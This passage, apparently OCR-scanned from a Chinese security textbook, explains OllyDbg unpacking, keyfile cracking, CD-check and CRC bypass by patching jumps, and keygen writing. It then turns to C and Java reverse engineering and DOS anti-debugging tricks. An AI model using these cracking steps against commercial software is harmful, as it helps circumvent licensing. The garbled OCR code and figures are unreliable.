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脱 壳 通 常 都 会 使 用 ProcDump32 这 个 通用 脱 壳 软件 ,可 以 解 开 绝 大 部 分 的 加 密 外 过 ,还 
有 脚本 功能 ,使 用 脚本 轻松 解 开 特定 外 过 的 加 密 文件 。 另 外 ,可 能 要 用 到 可 执行 文件 编辑 软 
件 ultraedit, 如 果 编 辑 的 软件 含有 汉字 ,汉字 会 出 现 乱码 。 

手工 脱 过 一般 用 Ollydbg 工具 (简称 OD) 来 查找 OEP,OEP 附近 的 PUSH AD( 压 栈 ) 
代表 程序 的 入 口 点 ,POP AD( 出 栈 ) 代 表 程 序 的 出 口 点 ,与 PUSH AD 相对 应 。 用 Ollydbg 
载 人 加 壳 软件 , 钓 掉 所 有 异常 , 按 Shift 十 F9 组 合 键 运行 跟踪 ,如 果 程 序 直接 退出 ,说 明 加 密 
过 检测 调试 器 ,此 时 需要 用 Ollydbg 插件 隐藏 Ollydbg。 

使 用 Ollydbg 手工 脱 壳 的 方法 很 多 ,如 单 步 跟踪 法 ,步骤 如 下 

(1) 用 Ollydbg 载 和 ,不 分 析 代码 。 

(2) 单 步 向 下 跟踪 F8, 是 向 下 跳 的 让 它 实 现 。 

(3) 遇 到 程序 往 回 跳 的 (包括 循环 ) ,在 下 一 句 代码 处 按 F4 键 设置 断 点 。 

(4) 绿色 线条 表示 跳 转 没 实现 ,不 用 理会 ,红色 线条 表示 跳 转 已 经 实现 。 

(5) 如 果 刚 载 人 程序 ,在 附近 就 有 一 个 CALL 的 ,就 按 F7 键 跟 进去 ,可 能 很 快 找 
到 OEP。 

(6) 如 果 运 行 到 某 个 CALL 程序 就 能 运行 ,就 按 F7 键 跟 进 这 个 CALL。 

(7) 在 大 的 跳 转 附近 找 OEP, 比 如 jmp XXXXXX 或 JE XXXXXX 或 者 有 RETE。 还 
有 ESP 定律 法 (在 OLLYDBG 的 ESP 寄存 器 中 设置 ESP 的 硬件 访问 断 点 )、 内 存 镜像 法 
( 按 Alt 十 M 组 合 键 打开 内 存 镜 像 ) .一步 到 达 OEP 最 后 一 次 异常 法 (把 调试 选项 里 面 的 异 
常 V 全 部 去 掉 ) ,模拟 跟踪 法 (看 有 没有 SEH 上 暗 桩 异常 )、SFX 法 等 方法 ,具体 参看 其 他 相关 
资料 。 

单 步 异 常 是 防止 跟踪 者 一 步 步 跟踪 程序 ,干扰 调试 ,Int3 中 断 是 检测 调试 器 用 的 ,可 用 
Shift 十 F9 组 合 键 略 过 所 有 蜡 常 ,找到 最 后 一 处 异常 ,在 它 的 恢复 异常 处 按 F2 键 下 断 点 , 按 
Shift 十 F9 组 合 键 运行 停 在 “跟随 ”的 位 置 ,再 取消 断 点 ,继续 按 F8 键 单 步 跟踪 ,一般 情况 下 
可 以 轻松 到 达 OEP。 

粗略 跟踪 的 时 候 一 般 都 是 常用 F8 键 , 碰 到 变形 Jmp 的 call 使 用 F7 键 跟踪 。 比 较 call 
的 目标 地 址 和 当前 地 址 ,如 果 两 者 离 的 很 近 , 一 般 就 是 变形 Jmp。 对 于 Call 的 目标 地 址 距 
离 很 远 ,可 以 放心 用 F8 键 带 过 。F8 键 跟踪 对 压缩 壳 用 的 很 多 ,F7 键 跟踪 加 密 壳 用 的 很 多 。 

找 OEP 时 注意 两 点 ,一 是 单 步 往 前 走 不 要 回头 ;二 是 观察 注意 posh ad posh {fd、pop 
ad、pop fd 等 的 值 和 外 壳 代 码 处 对 应 的 地 址 ,注意 地 址 发 生 大 的 变化 。 要 确定 从 所 有 Seh 异 
常 中 走出 来 ,如 果 前 面 有 大 量 循环 , 逐 段 解压 。 

脱 壳 后 如 果 发 现 程 序 不 能 运行 ,用 Imprec 修复 引入 函数 表 , 在 OEP 处 填 正 确 值 ,搜索 
输入 信息 ,确认 输入 表 全 部 有 效 。 如 果 仍 然 不 能 运行 ,只 有 用 Lordpe 重建 PE, 选 择 Imprec 
修复 文件 的 功能 。 另 外 还 可 以 对 程序 做 一 些 优 化 ,消除 无 用 代码 。 


7.3.6 其 他 破解 技术 


1. 破解 KeyFile 

先 用 FileMon 等 工具 监视 软件 对 文件 的 操作 ,以 找到 KeyFile 的 文件 名 ;建立 一 个 假 的 
KeyFile 文件 (* . key) ,使 用 十 六 进 制 工 具 ( 如 HexWorkshop) 编 辑 修 改 KeyFile; 在 Softice 
里 用 CreateFileA 函数 设 断 点 查看 其 打开 文件 名 指针 ,并 记 下 返回 的 句柄 : bpx CreateFileA 
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do "db x (esp 十 4)" 或 bpx _lopen do "dbx* (esp 十 4)"; 对 Readfile 函数 下 断 点 ,分 析 传 递 给 
ReadFile 的 文件 句柄 (与 前 面 的 相同 ) 和 缓冲 区 地 址 ,缓冲 区 存放 读 进 的 KeyFile 内 容 , 可 以 
通过 设 断 点 监视 。 

有 的 程序 读 KeyFile 时 可 能 会 先 判断 文件 大 小 、 属 性 和 移动 指针 等 ,因此 根据 情况 调整 
KeyFile 的 大 小 和 文件 名 。 伪 造 的 文件 内 容 必 须 易 读 ,因为 目标 程序 从 KeyFile 中 读 取 数 
据 , 然 后 进行 处 理 , 易 读 有 利于 跟踪 分 析 其 运算 过 程 。 可 用 W32DASM 或 十 六 进 制 工具 打 
开 程 序 用 查找 字符 串 方式 确定 KeyFile 文件 ( 读 用 户 手册 ) 。 

Windows 下 破解 KeyFile 几 个 常用 的 函数 : 


BOOL ReadFile ( // 从 文件 中 读 出 数据 函数 
HANDLE hFile, //Long, 文 件 的 句柄 
LPVOID lpBuffer, //any, 用 于 保存 读 入 数据 的 一 个 缓冲 区 
DWORD nNumberOfBytesToRead, //Long, 要 读 人 的 字符 数 
LPDWORD lpNuniberOfBytesRead, //Long, 从 文件 中 实际 读 入 的 字符 数 
LPOVERLAPPED lpOverlapped //address of structure for data 

); 

HANDLE CreateFileA( // 可 打开 和 创建 文件 ,管道 邮 槽 、 通 信服 务 ,设备 以 及 控制 台 
LPCTSTR lpFileName, //String, 要 打开 文件 的 名 字 
DWORD dwDesiredAccess, // 允 许 对 设备 进行 读 写 访问 
DWORD dwShareMode, // 共 享 模式 


LPSECURITY ATTRIBUTES lpSecurityAttributes 
// 指 向 一 个 SECURITY ATTRIBUTES 结构 的 指针 ,定义 了 文件 的 安全 特性 (如 果 操 作 系 统 支 持 ) 
DWORD dwCreationDistribution, // 如 何 创建 文件 
DWORD dwFlagsAndAttributes, //file attributes 
HANDLE hTemplateFile 
//Long, 如 不 为 0 则 指定 一 个 文件 句柄 。 新 文件 将 从 这 个 文件 中 复制 扩展 属性 
) 7 


HFIIE lopen( // 以 二 进 制 模式 打开 指定 的 文件 
LPCSTR lpPathName, // 要 打开 文件 的 名 字 
int iReadWrite // 访 问 模式 和 共享 模式 常数 的 一 个 组 合 
流 
2. 光盘 检测 


简单 也 最 常见 的 光盘 保护 就 是 程序 在 启动 时 判断 光驱 中 的 光盘 上 是 否 存在 特定 的 文 
件 ,如 果 不 存在 则 认为 用 户 没 有 正版 光盘 ,拒绝 运行 。 在 程序 运行 的 过 程 当 中 一 般 不 再 检查 
光盘 的 存在 与 否 。Windows 下 的 具体 实现 一 般 是 这 样 的 : 先 用 GetLogicalDriveStrings() 
或 GetLogicalDrives() 得 到 系统 中 安装 的 所 有 驱动 器 的 列表 ,然后 再 用 GetDriveType() 检 
查 每 一 个 驱动 器 ,返回 值 用 来 判断 一 个 驱动 器 的 类 型 : 0- 驱 动 器 不 能 识别 ;1- 指 定 的 目录 不 
存在 ;2-DriveRemoveable;3-A Fixed Disk (HardDrive) ; 4-Remote Drive(Network) ; 5-Cd- 
Rom 驱动 器 ;6-RamDisk。 如 果 是 光驱 则 用 CreateFileA() 或 FindFirstFileA() 等 函数 检查 
特定 的 文件 存在 与 否 ,并 可 能 进一步 地 检查 文件 的 属性 、 大 小 和 内 容 等 。 

这 种 光盘 检查 是 比较 容易 被 破解 的 ,缺少 光盘 程序 运行 出 现 一 些 错误 提示 如 Please 
insert the-CD 等 ,破解 者 可 在 W32DASM 中 用 串 式 数据 参考 功能 查找 相应 的 代码 ;也 可 以 
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利用 上 述 函 数 设 置 断 点 找到 程序 启动 时 检查 光驱 的 地 方 ,如 在 Ollydbg 中 输入 bpx 
GetDriveTypeA ,对 GetDriveTypeA 函数 下 断 点 ;最 后 修改 判断 指令 就 可 以 跳 过 光盘 检查 。 
其 他 一 些 CDROM 信息 : 中 断 2F 是 mscdex 中 断 ,可 用 bp int 2f, al=0 ah 二 15 检测 
mscdex 是 否 安装 。 

使 用 虚拟 光驱 法 欺骗 程序 检测 光盘 : 以 硬盘 代替 光盘 ,汇编 代码 cmp al,5;jnz short 将 
5( 指 光盘 ) 改 为 3( 硬 盘 ) 即 可 ;爆破 法 修改 监测 过 程 返回 值 是 eax, 为 1( 为 0 则 不 通过 检测 )， 
或 直接 修改 jnz short 地 址 的 跳 转 地 址 来 跳 过 光盘 检测 。 

3. CRC 自 校 验 

CRC 是 文件 自身 的 完整 性 校 验 ,一 旦 发 现 自己 的 关键 指令 被 修改 或 被 脱 过 了 之 后 , 毫 
无 提示 地 就 拒绝 运行 。 破 解 方法 一 是 开 多 个 Ollydbg( 一 般 两 个 ) ,对 关键 函数 如 CreateFile 
下 断 点 ,然后 单 步 跟 踪 ,发 现 了 自 校 验 的 关键 跳 转 进行 修改 。 方 法 二 是 比较 跟踪 原版 程序 ， 
记录 校 验算 法 的 几 个 结果 值 ,然后 在 脱 壳 后 的 文件 中 对 应 位 置 强行 写 人 来 解决 。 方 法 三 是 
由 于 CRC 校 验 都 要 用 CreateFile 打开 自身 文件 ,因此 先 跟踪 到 CreateFile, 用 它 打开 原版 
(未 脱 壳 或 修改 的 ) 文 件 进行 校 验 计 算 , 校 验 结 果 当 然 是 正确 的 ,实际 上 也 是 一 种 欺骗 。 

4. 注册 机 编写 

编写 注册 机 进行 破解 是 破解 的 高 级 阶段 ,做 一 个 注册 机 不 是 十 分 有 必要 ,除非 程序 对 注 
册 码 的 要 求 是 “一 机 一 码 ”。 一 般 都 要 跟踪 破解 原 软件 的 注册 码 生 成 的 算法 ,之 后 用 汇编 语 
言 \.C 语言 或 其 他 工具 把 算法 还 原 , 编 译 成 注册 机 。 

软件 的 注册 码 大 多 与 硬件 有 关 , 在 用 户 注册 的 时 候 会 根据 用 户 软件 所 安装 的 计算 机 软 
硬件 信息 生成 唯一 的 识别 码 (机 身 码 .注册 申请 码 等 ) ,根据 用 户 的 输入 信息 或 自动 计算 的 机 
身 码 来 计算 注册 码 。 可 以 使 用 Ollydbg 等 工具 下 断 追 踪 , 得 到 注册 码 的 计算 算法 ,将 它 放 和 
注册 机 编写 工具 如 CrackCode2000 ,keymake 等 进行 编译 就 可 以 了 。 如 果 对 算法 很 熟 ,也 可 
以 用 其 他 工具 如 C 语言 另外 写 。 

如 果 软 件 的 注册 算法 不 随 软件 发 布 ,最 好 根据 有 正确 注册 码 的 正版 软件 去 暴力 破解 。 


7.3.7 软件 逆向 工程 


借助 已 有 的 设计 良好 ,性 能 优越 的 软件 系统 能 够 快速 开发 出 一 个 有 效 的 复杂 软件 。 由 
于 软件 过 程 化 不 规范 或 文档 缺失 ,给 软件 的 识别 和 使 用 带 来 一 些 困难 ,阻碍 了 软件 技术 的 探 
索 和 发 展 。 软 件 逆向 工程 (Software Reverse Engineering) 通 过 对 软件 的 重新 理解 和 分 析 ， 
探索 软件 实现 原理 ,生成 相关 文档 ,为 软件 的 维护 、 复 用 以 及 创新 提供 了 可 靠 保证 。 

1. 逆向 工程 概念 

软件 的 正 向 工程 是 从 系统 的 高 层 抽象 和 逻辑 上 独立 于 实现 的 设计 到 系统 的 物理 设计 的 
传统 过 程 。 具 体 地 说 ,是 从 用 户 的 需求 到 高 层 设计 ,再 到 低层 设计 ,最 后 到 实现 的 过 程 。 

软件 逆向 工程 在 1990 年 由 Cross and Chikof sky 提出 ,是 对 软件 进行 反 向 分 析 的 整个 
过 程 。 又 称 为 软件 反 向 工程 ,是 指 从 可 运行 的 程序 系统 出 发 ,运用 反 汇编 、 系 统 分 析 和 程序 
理解 等 多 种 计算 机 技术 ,对 软件 的 结构 ,流程 .算法 、 代 码 等 进行 逆向 拆 解 和 分 析 ,推导 出 软 
件 产 品 的 源 代码 ,设计 原理 ,结构 、 算 法、 处 理 过 程 、 运 行 方 法 及 相关 文档 等 。 

软件 逆向 工程 的 任务 包括 分 析 系 统 、 抽 象 系统 和 展现 系统 ,以 确定 系统 的 组 件 和 组 件 之 
间 的 交互 作用 ,以 其 他 形式 表示 系统 ,或 在 较 高 的 抽象 层次 上 表示 系统 ,从 而 实现 协助 用 户 
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理解 系统 的 目的 。 分 析 系 统 是 指 分 析 系 统 的 结构 及 运行 过 程 ,包括 静态 信息 和 动态 信息 。 

再 工程 是 检查 和 改变 目标 系统 ,用 一 种 新 的 形式 重新 组 建 和 实现 目标 系统 。 再 工程 的 
目的 是 先进 行 某 种 逆向 工程 研究 系统 .生成 较 高 抽象 层次 上 的 描述 ,在 此 基础 上 使 用 正 向 工 
程 技术 ,添加 新 的 功能 或 结构 重组 ,开发 成 一 个 新 的 完整 系统 ,是 革新 和 改造 。 

2. 软件 逆向 分 析 实 例 

软件 逆向 工程 在 一 些 大 学 .科研 院 所 有 所 涉及 ,人 才 市 场 需求 大 。 国 外 已 经 开发 成 功 和 
正在 开发 的 逆向 工程 工具 有 很 多 ,如 RiGi、SCED, Rose、 Architec、 Snif、hnagix4D、August- 
[ Refine/C .Imagix 4D、AutoAnalyzer 和 CDADL 等 。 国 内 的 青鸟 程序 理解 系统 JBPAS、 
西安 电子 科技 大 学 软件 工程 研究 所 XDRE 已 应 用 于 军事 领域 。 

1) Java 语言 的 逆向 工程 

(1) 通过 eclipse 逆向 生成 UML 图 。 针 对 源码 的 动态 剖析 ,eclipse 的 JDT 提供 了 函数 
直接 跳 转 .调用 树 (CCall Hierarchy) .引用 搜索 (Reference Search) ,变量 的 读 操作 搜索 (Read 
Access Search) ,变量 的 写 操 作 搜 索 (Write Access Search) 函数 或 变量 的 申明 搜索 
(Declaration Search) 。eclipse 提供 了 功能 强大 的 Java 集成 调试 环境 。 针 对 源码 的 静态 剖 
析 ,JDT 提供 了 类 型 树 (Type Hierarchy) 和 接口 实现 搜索 (Timplementor Search)。 

(2) Java 逆向 生成 UML。 通 过 用 户 手册 (User Manual) ,功能 列表 (Feature List) 、 软 
件 的 release 版 本 进行 软件 功能 性 试用 ,得 到 用 例 (Use Case)。 通 过 对 源 代码 或 用 例 齐 析 代 
码 动态 结构 (功能 流 ) ,包括 设置 断 点 (Break Point) ,查看 调用 栈 (Call Stack) ;或 通过 集成 开 
发 环境 直接 对 函数 调用 进行 跟踪 ,包括 正 向 跟踪 (直接 查看 被 调 函 数 ) 和 反 向 跟踪 (查找 函数 
的 调用 者 ) ,得 到 代码 活动 图 。 或 者 使 用 UML Reverse Engineering 工具 直接 从 代码 逆向 生 
成 顺序 图 (Sequence Diagram) ,得 到 代码 结构 图 。 

2) C/C++ 逆向 举例 

(1) 识别 main 函数 。VC 编译 平台 下 ,在 函数 开始 的 第 一 个 3 个 push 下 面 的 call 就 是 
main 函数 ,4 个 push 后 面 跟 的 call 就 是 WinMain, 如 图 7.4 所 示 。main 函数 后 面 就 是 exit 
退出 函数 。 

edx, dword ptr [_environ] eax 
duord ptr [89929] 


duord ptr [48991C] 
，dword ptr [_ argc] 684601966 


，dword ptr [__argv] 


图 7.4 识别 main 函数 


(2) 申请 、 释 放 局 部 变量 内 存 空间 。 申 请 空间 用 Sub esp,xx( 申 请 较 多 ) 或 push 寄存 器 
(少量 空间 ) 。 释 放空 间 用 add esp,xx;mov esp,xx 或 pop ecx。 对 于 少量 的 内 存 空间 由 堆 
栈 管 理 ,使 用 push 申请 pop 释放 ,push 后 没有 对 应 的 pop 做 恢复 则 是 申请 空间 。 同 样 ,pop 
前 面 没有 push 与 之 配对 则 是 释放 栈 空 间 。 

(3) 参数 类 型 识别 。 有 格式 化 类 型 信息 如 push xx"%d" 说 明 是 整 型 ;指令 类 型 食 imul 
说 明 是 有 符号 数 ;函数 接收 参数 具体 类 型 如 push xx call puts, 则 参数 为 指针 。 
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(4) 识别 运算 操作 Lea。Lea 的 主要 作用 是 做 地 址 运算 ,使 用 [可 以 对 其 中 的 信息 作 运 
算 , 也 仅 限 在 已 有 的 寻 址 方式 范围 内 。 例 如 : 
加 法 : Printf("%d",a 十 b 十 6); 一 >Lea eax, [ebx 十 ecx 十 6] 


乘法 : a 十 bx* 4 十 6 一 >lea eax， [ebx 十 ecx* 4 十 6] 相对 基 变 (2/4/8) 
ax2 一 >lea eax, [ebx 十 ebx] /直接 相 乘 或 移 位 
ax3 一 一 lea eax，[ebx 十 ebxx 2] 


说 明 : 无 符号 是 2 的 倍数 可 以 做 右 移 位 ,[ebx 十 ecx* M] M 只 能 是 2、4、8。 

(5) 分 析 strlen。strlen 形式 挺 多 ,最 终 都 是 用 计数 找 0 结尾 长 度 , 减 去 结束 符 。 

(6) 识别 分 支 结构 。 单 分 支 计 语 句 , 比 较 语 句 条 件 不 成 立 就 跳 走 ,成 立 则 执行 让 语句 内 
的 代码 。 而 switch 是 判断 正 条 件 成 功 就 执行 ,在 没有 break 时 可 以 顺序 向 下 执行 。 

识别 default 分 支 时 ,看 break 跳 转 地 址 是 否 与 疑似 default 相同 ,对 于 switch 语句 后 面 
代码 较 多 的 情况 一 般 很 难 分 辨 ,没有 default 则 视 为 空 default 语句 。 识 别 case 语句 时 要 能 
识别 使 用 的 优化 方式 ,主要 是 跳 表 、 二 叉 树 ,标识 出 对 应 的 case 号 。 

局 部 变量 主要 使 用 栈 方式 来 寻 址 ,特征 是 使 用 [(esp/ebp) 一 /十 (value)], 对 于 某 些 固 
定常 量 可 能 会 直接 引用 ,也 有 使 用 寄存 器 的 情况 ,但 非 主流 。 

全 局 变量 在 编译 期 可 用 offset 取得 地 址 值 , 或 取 常 量 的 操作 。 

静态 变量 有 赋值 则 等 价 于 全 局 变量 。 静 态 变量 通过 附近 的 标志 值 来 标示 是 否 已 初始 
化 ,使 用 位 方式 标示 ,每 位 代表 一 个 静态 变量 ,0 未 初始 化 ,如 图 7. 5 所 示 。 


static int a; 
void Fun(int nualue) 


dword_40A8FS 
dword_48A960, 


arg 8= dword ptr 4 
static int b = nValue; 


test byte HSFCY 
a = malue; jnz 0 fitef 
printf("%d%d", a, b); or byte 48A8FC>N 

》 Mov dword _ 468F84 eax 
设置 标志 值 


(7) 识别 指针 操作 。 数 组 名 作 指针 使 用 ,会 优化 成 寄存 器 保存 其 地 址 做 访问 ,有 寄存 器 
保留 指针 说 明 被 保存 的 是 指针 ;对 内 存 有 地 址 类 操作 的 则 说 明 保 存 的 是 地 址 ,必定 是 指针 类 
型 ;对 指针 的 强制 类 型 转换 也 只 是 在 编译 器 下 作 说 明 而 已 ,而 在 内 存 中 是 什么 还 是 什么 , 当 
什么 用 就 是 什么 ,如 图 7. 6 所 示 。 


7.3.8 软件 破解 小 结 


要 打造 (理论 上 ) 不 能 被 破解 的 软件 ,软件 必须 省 略 或 没有 某 个 关键 的 功能 模块 代 
码 , 例 如 Demo 版 的 软件 。 如 果 Cracker 不 自己 写 代码 是 无 论 如 何 也 不 可 能 破解 成 全 功能 
的 软件 的 ,否则 不 管 key 如 何 变化 ,一 旦 Cracker 得 到 了 一 个 可 用 的 Key, 那 么 这 个 软件 就 
相当 于 可 以 在 本 地 执行 所 有 功能 一 次 ,就 可 以 被 破解 。 打 破 在 本 地 机 器 执行 所 有 代码 是 
软件 保护 的 有 效 办 法 ,而 在 非 本 地 机 器 上 存在 本 地 机 器 缺失 的 代码 可 以 利用 网 络 服 
务 器 。 

软件 分 析 是 一 种 比较 复杂 和 艰苦 的 工作 ,上 面 的 分 析 方 法 只 是 提供 了 一 种 基本 的 分 析 


push offset aDD 
call Sub_401853 
add esp, BCh 


*((&b)+1)=0 标 志 位 清 零 


图 7.5 静态 变量 作用 域 
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nt a sub esp, 8 

int ay; char szBuf[] = “Hello" ;| |movu eax, dword _ 48679834 
A char spStr = szBuf; mou cx, word_ 467838 

Scanf(%d®, Ba); | | printrCose", pstr[a); | |mow [esp*8ruar_8], eax 

mou edx, [esp*+8+uar 8] 


lea mou [esp*8*+var_4], cx 


push -eax mousx eax, byte ptr AEspredxrar ya r_8] 
push offset Format ; push eax 
call scanf push offset format 


printf 


二 = "Hello” ; 
a 程序 优化 后 ， 会 很 少 用 公式 的 乘法 ， 
而 是 转 成 加 法 操作 


printf("%c, %c", xpStre+, szBuf[i]);| 


int (xpFun)(int, int) = NULL; 
pFun = Max2; 
int Hax = pFfun(2, 3); 


ep 指向 的 某 内 存 地 址 
pd 人 从 的 角 各 闪 是 人 
push 说 是 int 就 int 

< > ， 说 是 函数 指针 就 
S00 ep 是 函数 指针 。 函数 指 针 
[ebp+vuar 8] ，eax 参数 也 是 编译 器 级 别 做 
[ebp+var_4]，offset Max3 | 管控 ， 汇 编 下 就 是 call 
bs 对 应 的 地 址 调用 


pFun = (int(#)(int, int))Max3; 
Hax = ((int(#)(int,int,int))Max3)(2,3,4); 


图 7.6 识别 指针 操作 


方法 ,要 积累 软件 分 析 的 经 验 需要 在 实践 中 不 断 地 探索 和 总 结 。 


7.4 反 跟 踪 技 术 


程序 运行 时 的 保护 一 般 利用 反 跟踪 技术 。 常 用 的 反 跟踪 技术 有 抑制 中 断 、 封 锁 键 盘 、 圭 
锁 显 示 、 检 测 跟踪 、 修 改 向 量 表 、 堆 栈 指针 、 指 令 流 队列 、 逆 指令 流 和 异常 处 理 等 。 

一 个 有 效 的 反 跟 踪 技 术 应 该 具有 三 大 特性 : 

(1) 重要 程序 段 是 不 可 跳 越 和 修改 的 ,如 果 其 中 有 内 容 被 修改 将 导致 出 错 ,同时 一 定 要 
保证 被 执行 。 

(2) 规定 只 能 由 加 密 系统 的 译 码 程序 来 转换 密码 ,重要 程序 段 可 分 段 加 密 , 运 行 时 逐 层 
解密 逐 层 清除 。 

(3) 加 密 系 统 是 不 可 动态 跟踪 执行 的 ,应 该 绝对 禁止 对 加 密 系统 的 动态 跟踪 。 

下 面 主要 以 DOS 下 的 Debug 为 例 介绍 一 下 常用 的 反 跟 踪 技术 。 

1. 抑制 跟踪 中 断 

Debug 的 T 和 G 命令 分 别 要 运行 系统 的 单 步 中 断 和 断 点 中 断 服务 程序 ,在 系统 向 量 表 
中 这 两 个 中 断 的 中 断 向 量 分 别 为 1 和 3, 中 断 服务 程序 的 入 口 地 址 分 别 存放 在 0000:0004 
和 0000:00OC 起 始 的 4 个 字 节 中 。 修 改 这 些 单元 中 的 内 容 ,从 而 阻止 王 和 G 命令 中 断 跟 
踪 。 具 体 实现 方法 如 下 : 将 这 些 单元 作为 堆栈 使 用 ;或 在 这 些 单元 中 送 入 软件 运行 的 必要 
数据 ;或 将 软件 中 某 个 子 程序 的 地 址 存放 在 这 些 单元 中 ;或 放 和 惩罚 性 程序 的 入口 地 址 。 

2. 封锁 键盘 输入 

各 种 跟踪 调试 软件 在 工作 时 ,都 要 从 键盘 上 接收 操作 者 发 出 的 命令 ,从 屏幕 上 显示 出 调 
试 跟踪 的 结果 。 因 此 关闭 这 些 外 围 设备 可 以 破坏 跟踪 调试 软件 的 运行 环境 。 键 盘 信息 输 入 
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采用 硬件 中 断 方式 ,由 BIOS 中 的 键盘 中 断 服务 程序 接收 .识别 和 转换 ,最 后 送 入 可 存放 16 
个 字符 的 键盘 缓冲 区 。 采 用 的 方法 有 : 

(1) 修改 中 断 服 务 人 口 。 键 盘 中 断 的 中 断 向 量 为 9,BIOS 的 键盘 I/O 中 断 的 中 断 向 量 
为 16H, 它 们 的 中 断 服务 程序 的 入 口 地 址 分 别 存放 在 内 存 地 址 0000:0024H 和 0000:0058H 
起 始 的 4 个 字 节 中 ,改变 这 些 地 址 中 的 内 容 , 键 盘 将 不 能 正常 输入 信息 。 

(2) 禁止 键盘 中 断 。 键 盘 中 断 是 一 个 可 屏蔽 中 断 , 将 中 断 屏蔽 寄存 器 的 第 1 位 设置 为 
1, 送 入 8259 中 断 控制 器 来 屏蔽 键盘 中 断 , 即 可 关闭 键盘 的 中 断 。 

(3) 禁止 接收 键盘 数据 。 


IN AL 61H 
OR AL 80H ;7FH 为 恢复 
OUT 61H AL 


(4) 不 接受 指定 输入 。 如 Debug 中 T、P 和 G 都 是 用 于 动态 跟踪 的 关键 命令 的 输入 。 
3. 封锁 屏幕 显示 
(1) 修改 显示 器 的 显示 前 景 和 背景 色彩 , 置 成 同一 种 颜色 。 如 黑色 : 


MOV AH, OBH 
MOV BH,O 
MOV BL,0 
INT 10H 


(2) 检查 屏幕 上 卷 和 换 页 等 操作 ,根据 屏幕 上 某 些 位 置 的 状态 变化 来 判断 是 否 有 人 在 
跟踪 程序 ,从 而 判断 加 密 系统 是 否 处 于 被 监控 状态 。 获 取 屏 幕 信息 的 指令 如 下 : 


MOV AH, 02 

MOV BH,0 

MOV DH, 行 光标 值 

MoV DL, 列 光标 值 

INT 10H 

(3) 修改 显示 器 I/O 中 断 服务 程序 INT 10H 的 入 口 地 址 0000:0040H 的 开始 4 个 字 
节 中 的 内 容 。 

(4) 定时 清 屏 。 

(5) 直接 对 视屏 缓冲 区 操作 ,定时 频繁 地 刷新 视屏 缓冲 区 中 的 内 容 。 

4. 检测 跟踪 法 

由 于 跟踪 调试 分 析 软 件 执行 时 ,许多 地 方 与 正常 执行 不 一 致 ,如 运行 环境 .中 断 人 口 和 
时 间 差 异 等 。 采取 措 施 对 这 些 地 方 进行 检测 ,就 可 以 发 现 跟踪 。 方 法 有 : 定时 检测 法 (比较 
实际 执行 时 间 比 正常 是 否 慢 )、 偶 尔 检测 法 (检测 关键 部 分 )、 利 用 时 钟 中 断 法 (扩充 INT 
1CH) 和 PSP 法 (检测 PSP 中 14H 与 16H 开始 的 两 个 字 节 是 否 相同 )。 

5. 破坏 中 断 向 量 表 

DOS 提供 了 从 0 到 FFH 的 256 个 中 断 调用 ,它们 驻 留 在 内 存 的 较 低地 址 中 ,相应 的 
入 口 地 址 位 于 内 存 0000:0000 至 0000:03FFH 中 ,每 个 人 口 地 址 由 4 字 节 组 成 ,其 中 前 两 个 
字 节 为 程序 的 偏 移 地 址 ,后 两 个 字 节 为 程序 的 段 地址 。DOS 和 BIOS 有 一 个 40 段 的 数据 
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区 , 它 位 于 内 存 0040:0000 至 0040:OOFFH, 这 256 个 字 节 存放 的 都 是 当前 系统 的 配置 情 
况 , 对 这 些 内 容 的 修改 也 会 直接 影响 到 各 类 跟踪 调试 软件 的 正常 运行 。 

6. 设置 堆栈 指针 法 

跟踪 调试 软件 在 运行 时 会 产生 对 堆栈 的 操作 动作 ,比如 保存 断 点 。 如 果 对 堆栈 指针 的 
值 进行 设置 ,使 指针 具备 一 定 的 抗 修改 性 来 阻止 跟踪 调试 。 如 将 堆栈 指针 设 到 ROM 区 ; 设 
在 程序 段 中 ; 设 在 中 断 向 量 表 内 ;将 堆栈 指针 移 作 它 用 (有 限制 )。 

7. 指令 流 队列 法 

CPU 为 了 提高 运行 速度 ,专门 开辟 了 一 个 指令 流 队 列 , 以 存放 将 要 执行 的 指令 。 在 程 
序 正常 执行 时 ,其 后 续 指 令 是 存放 在 指令 流 队 列 中 的 ,CPU 只 从 指令 流 队列 中 读 取 指 令 。 
而 跟踪 调试 程序 时 就 完全 不 同 了 ,要 执行 被 修改 的 指令 (包括 后 续 指令 )。 例 如 : 


JMP 52 

sl: JMP sl ; 死 循环 
52: LEA SI,sl 

IERA DI,s3 ”;s3 处 存放 sl 处 的 指令 
PUSH CS 

PUSH CS 

POP DS 

POP ES 

CLD 

LODSW 

STOSE 


8. 逆 指 令 流 法 

指令 代码 在 内 存 中 是 从 低地 址 向 高 地 址 存放 的 ,CPU 执行 顺序 也 是 如 此 ,这 个 过 程 由 
硬件 实现 。 逆 指令 流 法 特意 改变 指令 顺序 执行 的 方式 ,使 CPU 按 逆向 的 方式 执行 指令 ,使 
得 解密 者 根本 无 法 阅读 已 经 逆向 排列 的 指令 代码 ,从 而 阻止 解密 者 对 程序 的 跟踪 。 

具体 方法 是 : 逆向 排列 (从 高 地 址 向 低地 址 排列 ) 内 存 中 的 指令 代码 , 当 执行 时 , 按 正常 
顺序 修改 指令 的 取 指 寄存 器 CS:IP 的 值 , 使 指令 能 顺 向 执行 。 重 要 的 是 要 设置 单 步 中 断 标 
志 , 使 CPU 每 执行 完 一 条 指令 后 都 转 去 执行 INT 1 中 断 服务 程序 ,来 按 顺 向 取 指 顺序 修改 
CS:IP 的 值 。 还 应 注意 保护 当前 指令 地 址 后 的 数据 (5 字 节 ), 有 软 中 断 时 还 应 恢复 正常 
CS:IP 的 值 (不 修改 )。 

9.， 异常 处 理 反 跟踪 

程序 异常 处 理 分 为 结构 化 异常 处 理 (Structure Exception Handling, SEH) 和 向 量 异常 
处 理 (Vectored Exception Handling,VEH)。SEH 和 VEH 是 Windows 操作 系统 处 理 程序 
错误 或 异常 的 一 种 系统 机 制 ,可 以 利用 异常 处 理 的 断 点 计数 或 全 局 指针 加 密 来 进行 反 跟踪 。 

1) 结构 化 异常 处 理 

SEH 按 作用 域 可 以 分 为 两 类 : 一 类 是 监视 某 线程 中 某 段 代码 是 否 发 生 异常 , 称 为 线程 
相关 的 异常 处 理 过 程 ; 另 一 类 是 监视 整个 进程 中 所 有 线程 是 否 发 生 异 常 , 称 为 进程 相关 的 异 
常 处 理 过 程 或 顶层 异常 处 理 ,是 最 后 被 调用 的 异常 处 理 过 程 。 

线程 异常 处 理 是 局 部 的 , 仅 适 合 于 监视 某 段 特 定 代码 。 如 果 线程 发 生 异 常 ,系统 就 调用 
相应 的 回调 函数 ,根据 回调 函数 的 返回 值 采取 相应 的 动作 。 所 有 线程 的 异常 ,只 要 没有 由 线 
